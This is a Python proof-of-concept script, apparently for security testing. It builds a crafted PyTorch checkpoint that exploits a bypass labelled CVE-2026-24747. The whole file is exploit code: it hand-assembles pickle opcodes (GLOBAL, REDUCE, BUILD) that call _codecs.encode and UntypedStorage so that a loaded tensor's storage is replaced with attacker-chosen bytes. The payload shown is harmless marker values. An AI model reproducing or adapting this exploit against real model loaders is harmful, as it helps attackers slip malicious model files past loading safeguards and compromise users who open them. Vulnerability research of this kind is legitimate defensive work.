#!/usr/bin/env python3
"""
CVE-2026-24747 Variant: BUILD + REDUCE UntypedStorage Bypass

Uses nested REDUCE chains within a MARK scope to build the state tuple
for BUILD without leftover stack values.
"""

import io
import struct
import zipfile
import sys

def build_binunicode(s):
    """Return the pickle BINUNICODE opcode encoding of the text *s*.

    Layout: the BINUNICODE opcode byte, then the UTF-8 byte length as a
    little-endian unsigned 32-bit integer, then the UTF-8 bytes themselves.
    """
    from pickle import BINUNICODE
    raw = s.encode('utf-8')
    length_prefix = struct.pack('<I', len(raw))
    return b''.join((BINUNICODE, length_prefix, raw))

def create_exploit_checkpoint(output_path, payload_size=40):
    """Write a zip-format PyTorch checkpoint exercising the BUILD + REDUCE path.

    The archive's ``data.pkl`` is a hand-assembled protocol-2 pickle that:

    1. creates ``{}`` and the key ``'weights'``;
    2. rebuilds a 4-element tensor via ``torch._utils._rebuild_tensor_v2``,
       backed by persistent-id storage ``'0'`` (four zero float32s stored at
       ``archive/data/0``);
    3. applies BUILD to that tensor with the 4-tuple state
       ``(UntypedStorage(payload_bytes), 0, torch.Size([payload_size]), (1,))``,
       where ``payload_bytes`` holds ``payload_size`` little-endian float32s;
    4. stores the tensor under ``'weights'`` with SETITEM.

    Args:
        output_path: Filesystem path the checkpoint is written to
            (opened with ``'wb'``, so an existing file is overwritten).
        payload_size: Number of float32 values encoded into the payload
            storage; also used as the size in the BUILD state.

    Returns:
        The list of ``payload_size`` Python floats that were packed into the
        payload. NOTE(review): they are packed as float32, so values that are
        not exactly representable (e.g. 9999.99) will read back slightly
        rounded; compare with a tolerance rather than exact equality.
    """
    from pickle import (
        PROTO, GLOBAL, MARK, BINUNICODE, BINPUT, BINGET, BININT, BININT1,
        TUPLE, TUPLE1, TUPLE2, TUPLE3, BINPERSID, NEWFALSE, REDUCE, BUILD,
        SETITEM, STOP, EMPTY_TUPLE, BINFLOAT, EMPTY_DICT
    )
    # NOTE(review): BINGET, TUPLE3 and BINFLOAT are imported but never used.

    # Recognisable seed values followed by deterministic filler
    # (index * 111.0), truncated to exactly payload_size entries.
    MAGIC_VALUES = [
        1337.0, 31337.0, 42.0, 57005.0, 48879.0,
        51966.0, 47806.0, 64206.0, 9999.99, 12345.0,
    ]
    while len(MAGIC_VALUES) < payload_size:
        MAGIC_VALUES.append(float(len(MAGIC_VALUES) * 111))
    MAGIC_VALUES = MAGIC_VALUES[:payload_size]

    # Little-endian float32 bytes. Each byte is mapped to the code point with
    # the same value, so the 'latin-1' encode performed inside the pickle
    # below turns the string back into exactly these bytes.
    payload_bytes = struct.pack('<' + 'f' * payload_size, *MAGIC_VALUES)
    payload_str = ''.join(chr(b) for b in payload_bytes)

    # Raw bytes for archive/data/0: the 4-float storage that the tensor is
    # first rebuilt from (persistent-id key '0', numel=4 below).
    legit_storage = struct.pack('<ffff', 0.0, 0.0, 0.0, 0.0)

    pkl = bytearray()
    pkl += PROTO + b'\x02'

    # Outer container: a dict that will hold the tensor under 'weights'.
    # Everything needed for BUILD is assembled inside MARK scopes, so no
    # stray values remain on the main stack.
    # The BINPUT memo slots below are written but never read back (no BINGET
    # is emitted); the gaps in their numbering are harmless.

    pkl += EMPTY_DICT
    pkl += BINPUT + b'\x00'

    pkl += build_binunicode('weights')
    pkl += BINPUT + b'\x01'

    # === Create the tensor ===
    # _rebuild_tensor_v2(storage, 0, (4,), (1,), False, OrderedDict())
    pkl += GLOBAL + b'torch._utils\n_rebuild_tensor_v2\n'
    pkl += BINPUT + b'\x02'
    pkl += MARK  # args for _rebuild_tensor_v2

    # Storage via persistent load:
    # ('storage', torch.FloatStorage, '0', 'cpu', 4) -> BINPERSID
    pkl += MARK
    pkl += build_binunicode('storage')
    pkl += BINPUT + b'\x03'
    pkl += GLOBAL + b'torch\nFloatStorage\n'
    pkl += BINPUT + b'\x04'
    pkl += build_binunicode('0')
    pkl += BINPUT + b'\x05'
    pkl += build_binunicode('cpu')
    pkl += BINPUT + b'\x06'
    pkl += BININT1 + b'\x04'     # numel=4
    pkl += TUPLE
    pkl += BINPUT + b'\x07'
    pkl += BINPERSID

    pkl += BININT1 + b'\x00'     # offset
    pkl += BININT1 + b'\x04'     # size=(4,)
    pkl += TUPLE1
    pkl += BINPUT + b'\x08'
    pkl += BININT1 + b'\x01'     # stride=(1,)
    pkl += TUPLE1
    pkl += BINPUT + b'\x09'
    pkl += NEWFALSE              # requires_grad

    # backward_hooks = OrderedDict()  (callable + empty args, then REDUCE)
    pkl += GLOBAL + b'collections\nOrderedDict\n'
    pkl += BINPUT + b'\x0a'
    pkl += EMPTY_TUPLE
    pkl += REDUCE
    pkl += BINPUT + b'\x0b'

    pkl += TUPLE                 # Close args for _rebuild_tensor_v2
    pkl += BINPUT + b'\x0c'
    pkl += REDUCE                # -> tensor (shape 4)
    pkl += BINPUT + b'\x0d'

    # Now stack = [dict, 'weights', tensor]

    # === BUILD state tuple ===
    # Target: (UntypedStorage_with_payload, 0, torch.Size([payload_size]), (1,))
    #
    # A single MARK ... TUPLE collects exactly four elements. Each REDUCE pops
    # its args tuple and its callable and pushes the result, so every element
    # leaves exactly one value inside the MARK scope:
    # 1. UntypedStorage (via nested REDUCE chain)
    # 2. 0
    # 3. torch.Size([N]) (via REDUCE)
    # 4. (1,) via TUPLE1

    pkl += MARK  # Start of state tuple

    # Element 1: UntypedStorage(_codecs.encode(payload_str, 'latin-1'))
    # Stack effect inside the MARK scope:
    #   GLOBAL UntypedStorage        -> [cls]
    #   GLOBAL encode, str, 'latin-1' -> [cls, encode, str, enc]
    #   TUPLE2, REDUCE               -> [cls, bytes]
    #   TUPLE1, REDUCE               -> [storage]

    pkl += GLOBAL + b'torch.storage\nUntypedStorage\n'   # push class
    pkl += BINPUT + b'\x14'

    # Build the bytes argument via _codecs.encode.
    pkl += GLOBAL + b'_codecs\nencode\n'                 # push encode func
    pkl += BINPUT + b'\x10'
    pkl += build_binunicode(payload_str)                  # push string
    pkl += BINPUT + b'\x11'
    pkl += build_binunicode('latin-1')                    # push encoding
    pkl += BINPUT + b'\x12'
    pkl += TUPLE2                                         # (string, encoding)
    pkl += REDUCE                                         # -> bytes (replaces encode func)
    pkl += BINPUT + b'\x13'

    pkl += TUPLE1                                         # (bytes,)
    pkl += REDUCE                                         # UntypedStorage(bytes) - replaces class
    pkl += BINPUT + b'\x15'

    # Now in the MARK scope: [UntypedStorage_instance]

    # Element 2: offset = 0
    pkl += BININT1 + b'\x00'

    # Element 3: torch.Size([payload_size])
    pkl += GLOBAL + b'torch\nSize\n'                      # push Size class
    pkl += BINPUT + b'\x16'
    pkl += BININT + struct.pack('<i', payload_size)       # push int
    pkl += TUPLE1                                          # (payload_size,)
    pkl += TUPLE1                                          # ((payload_size,),)
    pkl += REDUCE                                          # Size([payload_size]) - replaces class
    pkl += BINPUT + b'\x17'

    # Element 4: stride = (1,)
    pkl += BININT1 + b'\x01'
    pkl += TUPLE1

    pkl += TUPLE  # Close state: (storage, 0, Size([N]), (1,))
    pkl += BINPUT + b'\x19'

    # === BUILD ===
    # BUILD pops the state and applies it to the tensor below it.
    # NOTE(review): for a 4-tuple state this presumably dispatches to
    # tensor.set_(*state); confirm against the torch version under test.
    pkl += BUILD

    # dict['weights'] = tensor
    pkl += SETITEM
    pkl += STOP

    # Zip layout: the pickle, raw bytes for persistent-id key '0', and
    # archive metadata records.
    output = io.BytesIO()
    with zipfile.ZipFile(output, 'w') as zf:
        zf.writestr('archive/data.pkl', bytes(pkl))
        zf.writestr('archive/data/0', legit_storage)
        zf.writestr('archive/version', '3\n')
        zf.writestr('archive/byteorder', 'little')
        zf.writestr('archive/.format_version', '1')
        zf.writestr('archive/.storage_alignment', '64')
        zf.writestr('archive/.data/serialization_id', '0' * 40)

    with open(output_path, 'wb') as f:
        f.write(output.getvalue())

    return MAGIC_VALUES

if __name__ == '__main__':
    # An optional first CLI argument overrides the default output location.
    cli_args = sys.argv[1:]
    if cli_args:
        output_path = cli_args[0]
    else:
        output_path = '/tmp/cve_2026_24747_bypass.pth'
    expected = create_exploit_checkpoint(output_path)
    # Only the leading values are echoed, to keep the output short.
    first_ten = expected[:10]
    print(f"Created: {output_path}")
    print(f"Expected: {first_ten}")
